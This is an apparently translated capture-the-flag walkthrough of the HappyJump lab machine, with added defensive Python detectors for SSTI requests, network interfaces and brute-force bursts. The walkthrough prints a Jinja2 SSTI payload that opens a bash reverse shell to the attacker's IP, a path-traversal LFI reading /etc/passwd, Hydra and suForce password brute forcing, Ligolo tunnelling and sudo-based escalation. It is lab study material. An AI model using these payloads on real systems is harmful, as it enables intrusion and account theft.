TheHackersLabs-HappyJump-Walkthrough
城南花已开 Lv6

Information Gathering

Service Discovery

sudo arp-scan -l
[sudo] password for Pepster:
Interface: eth0, type: EN10MB, MAC: 5e:bb:f6:9e:ee:fa, IPv4: 192.168.60.100
Starting arp-scan 1.10.0 with 256 hosts (https://github.com/royhills/arp-scan)
192.168.60.1 00:50:56:c0:00:08 VMware, Inc.
192.168.60.2 00:50:56:e3:f6:57 VMware, Inc.
192.168.60.191 08:00:27:8e:3c:10 PCS Systemtechnik GmbH
192.168.60.254 00:50:56:fd:65:82 VMware, Inc.

16 packets received by filter, 0 packets dropped by kernel
Ending arp-scan 1.10.0: 256 hosts scanned in 2.106 seconds (121.56 hosts/sec). 4 responded
export ip=192.168.60.191
❯ rustscan -a $ip
.----. .-. .-. .----..---. .----. .---. .--. .-. .-.
| {} }| { } |{ {__ {_ _}{ {__ / ___} / {} \ | `| |
| .-. \| {_} |.-._} } | | .-._} }\ }/ /\ \| |\ |
`-' `-'`-----'`----' `-' `----' `---' `-' `-'`-' `-'
The Modern Day Port Scanner.
________________________________________
: http://discord.skerritt.blog :
: https://github.com/RustScan/RustScan :
--------------------------------------
I scanned ports so fast, even my computer was surprised.

[~] The config file is expected to be at "/home/Pepster/.rustscan.toml"
[!] File limit is lower than default batch size. Consider upping with --ulimit. May cause harm to sensitive servers
[!] Your file limit is very small, which negatively impacts RustScan's speed. Use the Docker image, or up the Ulimit with '--ulimit 5000'.
Open 192.168.60.191:22
Open 192.168.60.191:5000
[~] Starting Script(s)
[~] Starting Nmap 7.94SVN ( https://nmap.org ) at 2025-02-18 20:01 CST
Initiating ARP Ping Scan at 20:01
Scanning 192.168.60.191 [1 port]
Completed ARP Ping Scan at 20:01, 0.09s elapsed (1 total hosts)
Initiating Parallel DNS resolution of 1 host. at 20:01
Completed Parallel DNS resolution of 1 host. at 20:01, 0.01s elapsed
DNS resolution of 1 IPs took 0.01s. Mode: Async [#: 3, OK: 0, NX: 1, DR: 0, SF: 0, TR: 1, CN: 0]
Initiating SYN Stealth Scan at 20:01
Scanning 192.168.60.191 [2 ports]
Discovered open port 22/tcp on 192.168.60.191
Discovered open port 5000/tcp on 192.168.60.191
Completed SYN Stealth Scan at 20:01, 0.03s elapsed (2 total ports)
Nmap scan report for 192.168.60.191
Host is up, received arp-response (0.00058s latency).
Scanned at 2025-02-18 20:01:54 CST for 0s

PORT STATE SERVICE REASON
22/tcp open ssh syn-ack ttl 64
5000/tcp open upnp syn-ack ttl 64
MAC Address: 08:00:27:8E:3C:10 (Oracle VirtualBox virtual NIC)

Read data files from: /usr/share/nmap
Nmap done: 1 IP address (1 host up) scanned in 0.33 seconds
Raw packets sent: 3 (116B) | Rcvd: 3 (116B)

SSTI Injection

Port 5000 is open; open it in a browser.

It starts with a registration panel.

There is an SSTI injection.

Use a payload to try to get a reverse shell.

{{ self._TemplateReference__context.cycler.__init__.__globals__.os.popen('bash -c \'bash -i >& /dev/tcp/192.168.60.100/4444 0>&1\'').read() }}
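The payload above works because user-controlled input reaches a Jinja2 template as template source rather than as a context variable. As an added example, not code from the original post or from the target application, here is a log-side detector for this pattern: it percent-decodes the query string of constructed access-log lines and flags template delimiters together with the attribute chains (`__globals__`, `popen`, `cycler`, ...) that turn an expression into code execution. The log lines, the regular expression and the indicator lists are my own constructions.

```python
"""Flag Jinja2/Flask SSTI probes in web access logs (added example, not the post's code)."""
import re
from urllib.parse import unquote_plus

# Constructed sample access log lines (not taken from the original post): one benign
# registration, one harmless arithmetic probe and one expression that reaches os.popen.
SAMPLE_LOG = """\
10.0.0.5 - - [18/Feb/2025:20:03:11 +0800] "POST /register?name=peter HTTP/1.1" 200 512
10.0.0.9 - - [18/Feb/2025:20:04:02 +0800] "POST /register?name=%7B%7B7*7%7D%7D HTTP/1.1" 200 498
10.0.0.9 - - [18/Feb/2025:20:05:40 +0800] "POST /register?name=%7B%7Bself._TemplateReference__context.cycler.__init__.__globals__.os.popen%28%27id%27%29.read%28%29%7D%7D HTTP/1.1" 200 530
"""

LOG_RE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] "(?P<method>\S+) (?P<url>\S+) [^"]*" (?P<status>\d{3})'
)
# Template expression delimiters (Jinja2, Twig, Freemarker-style); any one is worth a look.
DELIMS = ("{{", "{%", "${")
# Attribute chains and names that turn a template expression into code execution.
DANGEROUS = ("__globals__", "__class__", "__subclasses__", "__init__", "__builtins__",
             "__mro__", "popen", "os.", "subprocess", "cycler", "import")


def decode_params(url):
    """Return the query string decoded twice, so double-encoded probes are still visible."""
    _, _, query = url.partition("?")
    return unquote_plus(unquote_plus(query))


def classify(line):
    """Return (ip, url, severity, indicators); severity is none/suspicious/critical."""
    m = LOG_RE.match(line)
    if not m:
        return None
    decoded = decode_params(m["url"])
    delims = [d for d in DELIMS if d in decoded]
    if not delims:
        return (m["ip"], m["url"], "none", [])
    hits = [t for t in DANGEROUS if t in decoded]
    severity = "critical" if hits else "suspicious"
    return (m["ip"], m["url"], severity, delims + hits)


def scan(log_text):
    """Return only the flagged requests, most severe first."""
    order = {"critical": 0, "suspicious": 1}
    flagged = [r for r in map(classify, log_text.splitlines()) if r and r[2] != "none"]
    return sorted(flagged, key=lambda r: order[r[2]])


if __name__ == "__main__":
    for ip, url, severity, indicators in scan(SAMPLE_LOG):
        print(f"{severity:10} {ip:12} {url[:60]:60} {indicators}")
```

On the application side the fix is simpler than the detection: never hand user input to `render_template_string` (or string-concatenate it into a template); pass it as a context variable so Jinja2 treats it as data and autoescapes it.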

User privilege escalation

Listen on the port from Kali.

Huh? We already have user? That fast?

Could it be a fake flag?

❯ pwncat-cs -lp 4444
[20:06:11] Welcome to pwncat 🐈! __main__.py:164
[20:06:19] received connection from 192.168.60.191:57276 bind.py:84
[20:06:19] 0.0.0.0:4444: normalizing shell path manager.py:957
192.168.60.191:57276: registered new host w/ db manager.py:957
(local) pwncat$
(remote) peter@HappyJump:/home/peter$ ls -al
total 132
drwx------ 4 peter peter 4096 may 23 2024 .
drwxr-xr-x 4 root root 4096 may 23 2024 ..
-rw-r--r-- 1 peter peter 397 may 23 2024 app.py
lrwxrwxrwx 1 root root 9 may 23 2024 .bash_history -> /dev/null
-rw-r--r-- 1 peter peter 220 may 23 2024 .bash_logout
-rw-r--r-- 1 peter peter 3526 may 23 2024 .bashrc
drwxr-xr-x 3 peter peter 4096 may 23 2024 .local
-rw-r--r-- 1 peter peter 85 may 23 2024 nota.txt
-rw-r--r-- 1 peter peter 89887 may 23 2024 pivoting.png
-rw-r--r-- 1 peter peter 807 may 23 2024 .profile
-rw-r--r-- 1 peter peter 66 may 23 2024 .selected_editor
drwxr-xr-x 2 peter peter 4096 may 23 2024 templates
-r-------- 1 peter peter 36 may 23 2024 user.txt
(remote) peter@HappyJump:/home/peter$ cat user.txt
bdc7c8e1ce71e0ebff2d76d9b58c9b74 -

There is a hint in nota.txt.

There is also a PNG image; I download it.

Open it locally to have a look.

(remote) peter@HappyJump:/home/peter$ cat nota.txt
La copia de seguridad está en el contenedor final de Docker con la IP 10.10.10.2...
The backup is in the final Docker container with IP 10.10.10.2...
(remote) peter@HappyJump:/home/peter$
(local) pwncat$ download pivoting.png
pivoting.png ━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━ 100.0% • 89.9/89.9 KB • ? • 0:00:00
[20:11:18] downloaded 89.89KiB in 0.12 seconds download.py:71
(local) pwncat$
(remote) peter@HappyJump:/home/peter$

The image shows the details of the Docker deployment.

It looks like there are six network layers in total, good grief 😅

Check the network interface information.

In the current network environment, only the machine in the 10.x subnet can be pinged.

(remote) peter@HappyJump:/home/peter$ ip a
1: lo: <LOOPBACK,UP,LOWER_UP> mtu 65536 qdisc noqueue state UNKNOWN group default qlen 1000
link/loopback 00:00:00:00:00:00 brd 00:00:00:00:00:00
inet 127.0.0.1/8 scope host lo
valid_lft forever preferred_lft forever
inet6 ::1/128 scope host noprefixroute
valid_lft forever preferred_lft forever
2: enp0s3: <BROADCAST,MULTICAST,UP,LOWER_UP> mtu 1500 qdisc fq_codel state UP group default qlen 1000
link/ether 08:00:27:8e:3c:10 brd ff:ff:ff:ff:ff:ff
inet 192.168.60.191/24 brd 192.168.60.255 scope global dynamic enp0s3
valid_lft 1157sec preferred_lft 1157sec
inet6 fd15:4ba5:5a2b:1008:a00:27ff:fe8e:3c10/64 scope global dynamic mngtmpaddr
valid_lft 86381sec preferred_lft 14381sec
inet6 fe80::a00:27ff:fe8e:3c10/64 scope link
valid_lft forever preferred_lft forever
3: docker0: <NO-CARRIER,BROADCAST,MULTICAST,UP> mtu 1500 qdisc noqueue state DOWN group default
link/ether 02:42:88:a6:0e:6c brd ff:ff:ff:ff:ff:ff
inet 172.17.0.1/16 brd 172.17.255.255 scope global docker0
valid_lft forever preferred_lft forever
9: br-fcd1d7bd1ad6: <BROADCAST,MULTICAST,UP,LOWER_UP> mtu 1500 qdisc noqueue state UP group default
link/ether 02:42:a3:ee:19:f9 brd ff:ff:ff:ff:ff:ff
inet 10.10.10.1/24 brd 10.10.10.255 scope global br-fcd1d7bd1ad6
valid_lft forever preferred_lft forever
inet6 fe80::42:a3ff:feee:19f9/64 scope link
valid_lft forever preferred_lft forever
10: dm-f4526b3fe54f: <BROADCAST,NOARP,UP,LOWER_UP> mtu 1500 qdisc noqueue state UNKNOWN group default
link/ether 7e:2b:bd:57:c0:51 brd ff:ff:ff:ff:ff:ff
inet6 fe80::dcb8:d8ff:fefa:74d9/64 scope link
valid_lft forever preferred_lft forever
11: dm-35ea21273a0e: <BROADCAST,NOARP,UP,LOWER_UP> mtu 1500 qdisc noqueue state UNKNOWN group default
link/ether d6:08:ef:77:3c:8b brd ff:ff:ff:ff:ff:ff
inet6 fe80::f826:7aff:fe07:2efb/64 scope link
valid_lft forever preferred_lft forever
12: dm-24ce431d49b3: <BROADCAST,NOARP,UP,LOWER_UP> mtu 1500 qdisc noqueue state UNKNOWN group default
link/ether d2:3d:61:41:fd:f1 brd ff:ff:ff:ff:ff:ff
inet6 fe80::8477:f1ff:fee1:8410/64 scope link
valid_lft forever preferred_lft forever
13: dm-ef2458e407b5: <BROADCAST,NOARP,UP,LOWER_UP> mtu 1500 qdisc noqueue state UNKNOWN group default
link/ether a2:77:f8:d2:fa:ca brd ff:ff:ff:ff:ff:ff
inet6 fe80::a077:f8ff:fed2:faca/64 scope link
valid_lft forever preferred_lft forever
15: veth4280f9e@if14: <BROADCAST,MULTICAST,UP,LOWER_UP> mtu 1500 qdisc noqueue master br-fcd1d7bd1ad6 state UP group default
link/ether 46:ae:33:81:8b:5e brd ff:ff:ff:ff:ff:ff link-netnsid 0
inet6 fe80::44ae:33ff:fe81:8b5e/64 scope link
valid_lft forever preferred_lft forever
(remote) peter@HappyJump:/home/peter$ ping 10.10.10.2
PING 10.10.10.2 (10.10.10.2) 56(84) bytes of data.
64 bytes from 10.10.10.2: icmp_seq=1 ttl=64 time=1.52 ms
64 bytes from 10.10.10.2: icmp_seq=2 ttl=64 time=0.034 ms
^C
--- 10.10.10.2 ping statistics ---
2 packets transmitted, 2 received, 0% packet loss, time 1001ms
rtt min/avg/max/mdev = 0.034/0.776/1.518/0.742 ms
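The interface listing is what makes this host the pivot: it holds addresses on the external 192.168.60.0/24 network, on the default docker0 bridge and on the user-defined br-fcd1d7bd1ad6 bridge that carries 10.10.10.0/24. As an added example, not part of the original post, this parser pulls that list out of `ip a` output so a segmentation review can enumerate every network a host bridges; the sample is trimmed from the output above, and the regular expressions are my own.

```python
"""List the IPv4 networks a host is attached to from `ip a` output (added example)."""
import ipaddress
import re

# Trimmed from the `ip a` output shown above; indentation is as the real tool prints it.
SAMPLE_IP_A = """\
1: lo: <LOOPBACK,UP,LOWER_UP> mtu 65536 qdisc noqueue state UNKNOWN group default qlen 1000
    link/loopback 00:00:00:00:00:00 brd 00:00:00:00:00:00
    inet 127.0.0.1/8 scope host lo
       valid_lft forever preferred_lft forever
2: enp0s3: <BROADCAST,MULTICAST,UP,LOWER_UP> mtu 1500 qdisc fq_codel state UP group default qlen 1000
    link/ether 08:00:27:8e:3c:10 brd ff:ff:ff:ff:ff:ff
    inet 192.168.60.191/24 brd 192.168.60.255 scope global dynamic enp0s3
3: docker0: <NO-CARRIER,BROADCAST,MULTICAST,UP> mtu 1500 qdisc noqueue state DOWN group default
    link/ether 02:42:88:a6:0e:6c brd ff:ff:ff:ff:ff:ff
    inet 172.17.0.1/16 brd 172.17.255.255 scope global docker0
9: br-fcd1d7bd1ad6: <BROADCAST,MULTICAST,UP,LOWER_UP> mtu 1500 qdisc noqueue state UP group default
    link/ether 02:42:a3:ee:19:f9 brd ff:ff:ff:ff:ff:ff
    inet 10.10.10.1/24 brd 10.10.10.255 scope global br-fcd1d7bd1ad6
15: veth4280f9e@if14: <BROADCAST,MULTICAST,UP,LOWER_UP> mtu 1500 qdisc noqueue master br-fcd1d7bd1ad6 state UP group default
    link/ether 46:ae:33:81:8b:5e brd ff:ff:ff:ff:ff:ff link-netnsid 0
"""

IFACE_RE = re.compile(r"^\d+: (?P<name>[^:@]+)(?:@\S+)?: <(?P<flags>[^>]*)>.*\bstate (?P<state>\S+)")
INET_RE = re.compile(r"^\s*inet (?P<cidr>\d+\.\d+\.\d+\.\d+/\d+)")


def parse_ip_a(text):
    """Group `ip a` lines into interfaces with their flags, state and IPv4 networks."""
    ifaces, cur = [], None
    for line in text.splitlines():
        m = IFACE_RE.match(line)
        if m:
            cur = {"name": m["name"], "flags": set(m["flags"].split(",")),
                   "state": m["state"], "networks": []}
            ifaces.append(cur)
            continue
        m = INET_RE.match(line)
        if m and cur is not None:
            cur["networks"].append(ipaddress.ip_interface(m["cidr"]).network)
    return ifaces


def bridged_networks(text):
    """(interface, network, state) for every non-loopback IPv4 network the host sits on."""
    out = []
    for iface in parse_ip_a(text):
        if "LOOPBACK" in iface["flags"]:
            continue
        for net in iface["networks"]:
            out.append((iface["name"], str(net), iface["state"]))
    return out


if __name__ == "__main__":
    for name, net, state in bridged_networks(SAMPLE_IP_A):
        print(f"{name:18} {net:18} {state}")
```

The state column matters for the review: docker0 is DOWN (no container attached to it), so the only internal network actually reachable from this host is the one behind br-fcd1d7bd1ad6, which is exactly what the ping above confirms.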

Setting up a tunnel with Ligolo

Try to use Ligolo to set up a TUN tunnel into the internal network.

For details, see TheHackersLabs-TheOffice-Walkthrough | Pepster’Blog

## First create the virtual interface on Kali
sudo ./proxy -selfcert
WARN[0000] Using default selfcert domain 'ligolo', beware of CTI, SOC and IoC!
WARN[0000] Using self-signed certificates
WARN[0000] TLS Certificate fingerprint for ligolo is: 36C07692CB8DE46FF8EE2E7AE336EF247203DEBFCF7117298621D70583C93D3F
INFO[0000] Listening on 0.0.0.0:11601
__ _ __
/ / (_)___ _____ / /___ ____ ____ _
/ / / / __ `/ __ \/ / __ \______/ __ \/ __ `/
/ /___/ / /_/ / /_/ / / /_/ /_____/ / / / /_/ /
/_____/_/\__, /\____/_/\____/ /_/ /_/\__, /
/____/ /____/

Made in France ♥ by @Nicocha30!
Version: 0.7.5

ligolo-ng » interface_create --name "ligolo"
INFO[0007] Creating a new "ligolo" interface...
INFO[0007] Interface created!
ligolo-ng » INFO[0029] Agent joined. id=4f3367e0-dde4-4128-86d6-4da2dc266aed name=peter@HappyJump remote="192.168.60.191:34364"
-----------------------------------------
## Run the connection on the target
(remote) peter@HappyJump:/tmp$ ./agent -connect 192.168.60.100:11601 -ignore-cert
WARN[0000] warning, certificate validation disabled
INFO[0000] Connection established addr="192.168.60.100:11601"

Bind the session to the ligolo virtual interface to establish the TUN connection.

ligolo-ng » session
? Specify a session : 1 - peter@HappyJump - 192.168.60.191:34364 - 4f3367e0-dde4-4128-86d6-4da2dc266aed
[Agent : peter@HappyJump] » tunnel_start --tun ligolo
[Agent : peter@HappyJump] » INFO[0113] Starting tunnel to peter@HappyJump (4f3367e0-dde4-4128-86d6-4da2dc266aed)
## Meanwhile, in another tty, add the route manually
sudo ip route add 10.10.10.0/24 dev ligolo

First I use fscan to scan for live hosts in the same subnet.

❯ fscan -h 10.10.10.0/24

___ _
/ _ \ ___ ___ _ __ __ _ ___| | __
/ /_\/____/ __|/ __| '__/ _` |/ __| |/ /
/ /_\\_____\__ \ (__| | | (_| | (__| <
\____/ |___/\___|_| \__,_|\___|_|\_\
fscan version: 2.0.0
[*] 扫描类型: all, 目标端口: 21,22,80,81,135,139,443,445,1433,1521,3306,5432,6379,7001,8000,8080,8089,9000,9200,11211,27017,80,81,82,83,84,85,86,87,88,89,90,91,92,98,99,443,800,801,808,880,888,889,1000,1010,1080,1081,1082,1099,1118,1888,2008,2020,2100,2375,2379,3000,3008,3128,3505,5555,6080,6648,6868,7000,7001,7002,7003,7004,7005,7007,7008,7070,7071,7074,7078,7080,7088,7200,7680,7687,7688,7777,7890,8000,8001,8002,8003,8004,8006,8008,8009,8010,8011,8012,8016,8018,8020,8028,8030,8038,8042,8044,8046,8048,8053,8060,8069,8070,8080,8081,8082,8083,8084,8085,8086,8087,8088,8089,8090,8091,8092,8093,8094,8095,8096,8097,8098,8099,8100,8101,8108,8118,8161,8172,8180,8181,8200,8222,8244,8258,8280,8288,8300,8360,8443,8448,8484,8800,8834,8838,8848,8858,8868,8879,8880,8881,8888,8899,8983,8989,9000,9001,9002,9008,9010,9043,9060,9080,9081,9082,9083,9084,9085,9086,9087,9088,9089,9090,9091,9092,9093,9094,9095,9096,9097,9098,9099,9100,9200,9443,9448,9800,9981,9986,9988,9998,9999,10000,10001,10002,10004,10008,10010,10250,12018,12443,14000,16080,18000,18001,18002,18004,18008,18080,18082,18088,18090,18098,19001,20000,20720,21000,21501,21502,28018,20880
[*] 开始信息扫描...
[*] CIDR范围: 10.10.10.0-10.10.10.255
[*] 已生成IP范围: 10.10.10.0 - 10.10.10.255
[*] 已解析CIDR 10.10.10.0/24 -> IP范围 10.10.10.0-10.10.10.255
[*] 最终有效主机数量: 256
[-] 正在尝试无监听ICMP探测...
[-] 当前用户权限不足,无法发送ICMP包
[*] 切换为PING方式探测...
[+] 目标 10.10.10.1 存活 (ICMP)
[+] 目标 10.10.10.2 存活 (ICMP)
[+] ICMP存活主机数量: 2
[*] 共解析 218 个有效端口
[+] 端口开放 10.10.10.1:22
[!] 打开文件失败 result.txt: open result.txt: permission denied
[+] 端口开放 10.10.10.2:22
[!] 打开文件失败 result.txt: open result.txt: permission denied
[+] 端口开放 10.10.10.2:80
[!] 打开文件失败 result.txt: open result.txt: permission denied
[+] 存活端口数量: 3
[*] 开始漏洞扫描...
[*] 网站标题 http://10.10.10.2 状态码:200 长度:10701 标题:Apache2 Debian Default Page: It works
[!] 打开文件失败 result.txt: open result.txt: permission denied
[!] 扫描错误 10.10.10.2:22 - ssh: handshake failed: read tcp 192.168.60.100:60576->10.10.10.2:22: i/o timeout
[!] 扫描错误 10.10.10.1:22 - 扫描总时间超时: context deadline exceeded
[+] 扫描已完成: 3/3
[*] 扫描结束,耗时: 15.173915272s
❯ rustscan -a 10.10.10.2
.----. .-. .-. .----..---. .----. .---. .--. .-. .-.
| {} }| { } |{ {__ {_ _}{ {__ / ___} / {} \ | `| |
| .-. \| {_} |.-._} } | | .-._} }\ }/ /\ \| |\ |
`-' `-'`-----'`----' `-' `----' `---' `-' `-'`-' `-'
The Modern Day Port Scanner.
________________________________________
: http://discord.skerritt.blog :
: https://github.com/RustScan/RustScan :
--------------------------------------
TreadStone was here 🚀

[~] The config file is expected to be at "/home/Pepster/.rustscan.toml"
[!] File limit is lower than default batch size. Consider upping with --ulimit. May cause harm to sensitive servers
[!] Your file limit is very small, which negatively impacts RustScan's speed. Use the Docker image, or up the Ulimit with '--ulimit 5000'.
Open 10.10.10.2:22
Open 10.10.10.2:80

I try a directory scan.

❯ gobuster dir -u http://10.10.10.2 -w /usr/share/seclists/Discovery/Web-Content/common.txt -x php,html,zip,txt -b 403,404
===============================================================
Gobuster v3.6
by OJ Reeves (@TheColonial) & Christian Mehlmauer (@firefart)
===============================================================
[+] Url: http://10.10.10.2
[+] Method: GET
[+] Threads: 10
[+] Wordlist: /usr/share/seclists/Discovery/Web-Content/common.txt
[+] Negative Status codes: 403,404
[+] User Agent: gobuster/3.6
[+] Extensions: php,html,zip,txt
[+] Timeout: 10s
===============================================================
Starting gobuster in directory enumeration mode
===============================================================
/index.html (Status: 200) [Size: 10701]
/index.html (Status: 200) [Size: 10701]
/shop (Status: 301) [Size: 307] [--> http://10.10.10.2/shop/]
Progress: 23670 / 23675 (99.98%)
===============================================================
Finished
===============================================================

There is an image; I try to wget it, it might contain steganography.

The image is clearly the wrong direction.

LFI file read

But there is an error message below the image; I try passing a parameter, and it turns out to be an LFI.

Files can be read.

Got two users: seller and manchi.

❯ curl "http://10.10.10.2/shop/?archivo=../../../../../etc/passwd" |grep /bin/bash
% Total % Received % Xferd Average Speed Time Time Time Current
Dload Upload Total Spent Left Speed
100 2253 100 2253 0 0 145k 0 --:--:-- --:--:-- --:--:-- 146k
<pre>root:x:0:0:root:/root:/bin/bash
seller:x:1000:1000:seller,,,:/home/seller:/bin/bash
manchi:x:1001:1001:manchi,,,:/home/manchi:/bin/bash

Brute force with Hydra

Try brute-forcing SSH for each user; got manchi's password: lovely.

❯ hydra -l manchi -P /usr/share/wordlists/rockyou.txt ssh://10.10.10.2 -I
Hydra v9.5 (c) 2023 by van Hauser/THC & David Maciejak - Please do not use in military or secret service organizations, or for illegal purposes (this is non-binding, these *** ignore laws and ethics anyway).

Hydra (https://github.com/vanhauser-thc/thc-hydra) starting at 2025-02-18 21:02:26
[WARNING] Many SSH configurations limit the number of parallel tasks, it is recommended to reduce the tasks: use -t 4
[WARNING] Restorefile (ignored ...) from a previous session found, to prevent overwriting, ./hydra.restore
[DATA] max 16 tasks per 1 server, overall 16 tasks, 14344399 login tries (l:1/p:14344399), ~896525 tries per task
[DATA] attacking ssh://10.10.10.2:22/
[22][ssh] host: 10.10.10.2 login: manchi password: lovely
1 of 1 target successfully completed, 1 valid password found
[WARNING] Writing restore file because 2 final worker threads did not complete until end.
[ERROR] 2 targets did not resolve or could not be connected
[ERROR] 0 target did not complete
Hydra (https://github.com/vanhauser-thc/thc-hydra) finished at 2025-02-18 21:02:33

Try logging in.

Do information gathering and run linpeas.

Look for the backup file mentioned in the hint; nothing found.

❯ ssh [email protected]
The authenticity of host '10.10.10.2 (10.10.10.2)' can't be established.
ED25519 key fingerprint is SHA256:7l7ozEpa6qePwn/o8bYoxlwtLa2knvlaSKIk1mkRMfU.
This key is not known by any other names.
Are you sure you want to continue connecting (yes/no/[fingerprint])? yes
Warning: Permanently added '10.10.10.2' (ED25519) to the list of known hosts.
[email protected]'s password:
Linux 851709aee958 6.1.0-21-amd64 #1 SMP PREEMPT_DYNAMIC Debian 6.1.90-1 (2024-05-03) x86_64

The programs included with the Debian GNU/Linux system are free software;
the exact distribution terms for each program are described in the
individual files in /usr/share/doc/*/copyright.

Debian GNU/Linux comes with ABSOLUTELY NO WARRANTY, to the extent
permitted by applicable law.
Last login: Sun Apr 14 16:47:47 2024 from 172.17.0.1
manchi@851709aee958:~$ ls -al
total 20
drwx------ 2 manchi manchi 4096 Apr 14 2024 .
drwxr-xr-x 1 root root 4096 Apr 14 2024 ..
-rw-r--r-- 1 manchi manchi 220 Apr 14 2024 .bash_logout
-rw-r--r-- 1 manchi manchi 3526 Apr 14 2024 .bashrc
-rw-r--r-- 1 manchi manchi 807 Apr 14 2024 .profile

Brute force with SuForce

There is nothing at all under this user, so as a last resort I try brute-forcing passwords.

And a weak password actually came out.

User seller, password qwerty

manchi@851709aee958:/tmp$ wget 192.168.60.100/suForce
--2025-02-18 13:20:37-- http://192.168.60.100/suForce
Connecting to 192.168.60.100:80... connected.
HTTP request sent, awaiting response... 200 OK
Length: 2430 (2.4K) [application/octet-stream]
Saving to: 'suForce'

suForce 100%[=======================================================================>] 2.37K --.-KB/s in 0s

2025-02-18 13:20:37 (394 MB/s) - 'suForce' saved [2430/2430]

manchi@851709aee958:/tmp$ chmod +x suForce
manchi@851709aee958:/tmp$ wget 192.168.60.100/techyou.txt
--2025-02-18 13:20:48-- http://192.168.60.100/techyou.txt
Connecting to 192.168.60.100:80... connected.
HTTP request sent, awaiting response... 200 OK
Length: 161891 (158K) [text/plain]
Saving to: 'techyou.txt'

techyou.txt 100%[=======================================================================>] 158.10K --.-KB/s in 0.006s

2025-02-18 13:20:48 (26.4 MB/s) - 'techyou.txt' saved [161891/161891]
manchi@851709aee958:/tmp$ ./suForce -u seller -w techyou.txt
_____
___ _ _ | ___|__ _ __ ___ ___
/ __| | | || |_ / _ \| '__/ __/ _ \
\__ \ |_| || _| (_) | | | (_| __/
|___/\__,_||_| \___/|_| \___\___|
───────────────────────────────────
code: d4t4s3c version: v1.0.0
───────────────────────────────────
🎯 Username | seller
📖 Wordlist | techyou.txt
🔎 Status | 20/20000/0%/qwerty
💥 Password | qwerty
───────────────────────────────────
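Hydra found manchi's password within seconds and suForce found seller's after 20 guesses; on the container both leave the same trace in the auth log, a dense burst of failures followed by a success. As an added example, not code from the original post, this detector groups sshd and su events by actor (source IP for sshd, calling user for su), alerts when a time window holds too many failures, and names the account whose success followed the burst. The log lines are constructed; the message patterns follow the standard Debian sshd and util-linux su formats. The same logic covers the later Hydra run against the mario account over SSH.

```python
"""Detect password-guessing bursts against sshd and su from auth-log lines (added example)."""
import re
from collections import defaultdict
from datetime import datetime

# Constructed sample auth.log lines (not from the original post): a burst of SSH failures
# from one source followed by a success, an unrelated key login, and a burst of failed
# su attempts by a local user followed by a success.
SAMPLE_AUTH_LOG = """\
Feb 18 21:02:26 host sshd[4101]: Failed password for manchi from 10.10.10.1 port 50102 ssh2
Feb 18 21:02:26 host sshd[4102]: Failed password for manchi from 10.10.10.1 port 50104 ssh2
Feb 18 21:02:27 host sshd[4103]: Failed password for invalid user admin from 10.10.10.1 port 50106 ssh2
Feb 18 21:02:27 host sshd[4104]: Failed password for manchi from 10.10.10.1 port 50108 ssh2
Feb 18 21:02:28 host sshd[4105]: Failed password for manchi from 10.10.10.1 port 50110 ssh2
Feb 18 21:02:28 host sshd[4106]: Failed password for manchi from 10.10.10.1 port 50112 ssh2
Feb 18 21:02:33 host sshd[4107]: Accepted password for manchi from 10.10.10.1 port 50120 ssh2
Feb 18 21:10:01 host sshd[4200]: Accepted publickey for ops from 192.168.60.5 port 41000 ssh2
Feb 18 13:20:50 host su[2201]: FAILED SU (to seller) manchi on pts/0
Feb 18 13:20:50 host su[2202]: FAILED SU (to seller) manchi on pts/0
Feb 18 13:20:51 host su[2203]: FAILED SU (to seller) manchi on pts/0
Feb 18 13:20:51 host su[2204]: FAILED SU (to seller) manchi on pts/0
Feb 18 13:20:52 host su[2205]: FAILED SU (to seller) manchi on pts/0
Feb 18 13:20:52 host su[2206]: (to seller) manchi on pts/0
"""

SYSLOG_RE = re.compile(r"^(?P<ts>\w{3} +\d{1,2} \d{2}:\d{2}:\d{2}) (?P<host>\S+) (?P<msg>.*)$")
# (kind, pattern, success); order matters because the su failure line also contains "(to X) Y on".
PATTERNS = (
    ("ssh", re.compile(r"sshd\[\d+\]: Failed password for (?:invalid user )?(?P<user>\S+) from (?P<actor>\S+)"), False),
    ("ssh", re.compile(r"sshd\[\d+\]: Accepted \w+ for (?P<user>\S+) from (?P<actor>\S+)"), True),
    ("su", re.compile(r"su(?:\[\d+\])?: FAILED SU \(to (?P<user>\S+)\) (?P<actor>\S+) on"), False),
    ("su", re.compile(r"su(?:\[\d+\])?: \(to (?P<user>\S+)\) (?P<actor>\S+) on"), True),
)


def parse_events(log_text, year=2025):
    """Return sorted (timestamp, kind, actor, target_user, success) tuples for known lines."""
    events = []
    for line in log_text.splitlines():
        m = SYSLOG_RE.match(line)
        if not m:
            continue
        ts = datetime.strptime(f"{year} {m['ts']}", "%Y %b %d %H:%M:%S")
        for kind, pattern, success in PATTERNS:
            pm = pattern.search(m["msg"])
            if pm:
                events.append((ts, kind, pm["actor"], pm["user"], success))
                break
    return sorted(events)


def detect(log_text, threshold=5, window_s=60):
    """Alert on any actor with >= threshold failures inside window_s seconds.

    A success by the same actor within window_s of the last failure is reported as a
    probably guessed account, which is the event worth paging on.
    """
    by_actor = defaultdict(list)
    for ev in parse_events(log_text):
        by_actor[(ev[1], ev[2])].append(ev)
    alerts = []
    for (kind, actor), evs in by_actor.items():
        fails = [e[0] for e in evs if not e[4]]
        best, lo = 0, 0
        for hi in range(len(fails)):               # sliding window over sorted failure times
            while (fails[hi] - fails[lo]).total_seconds() > window_s:
                lo += 1
            best = max(best, hi - lo + 1)
        if best < threshold:
            continue
        last_fail = fails[-1]
        guessed = sorted({e[3] for e in evs
                          if e[4] and 0 <= (e[0] - last_fail).total_seconds() <= window_s})
        alerts.append({"kind": kind, "actor": actor,
                       "failures_in_window": best, "guessed_accounts": guessed})
    return sorted(alerts, key=lambda a: (not a["guessed_accounts"], a["kind"], a["actor"]))


if __name__ == "__main__":
    for alert in detect(SAMPLE_AUTH_LOG):
        print(alert)
```

Threshold and window are the tuning knobs: Hydra's default of 16 parallel tasks produces far more than five failures per minute, so a low threshold catches it early, while the su burst from a local wordlist tool is only visible because su logs each failed attempt with the calling user.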

There is a sudo privilege; just use php to escalate.

seller@851709aee958:~$ sudo -l
Matching Defaults entries for seller on 851709aee958:
env_reset, mail_badpass, secure_path=/usr/local/sbin\:/usr/local/bin\:/usr/sbin\:/usr/bin\:/sbin\:/bin, use_pty

User seller may run the following commands on 851709aee958:
(ALL) NOPASSWD: /usr/bin/php
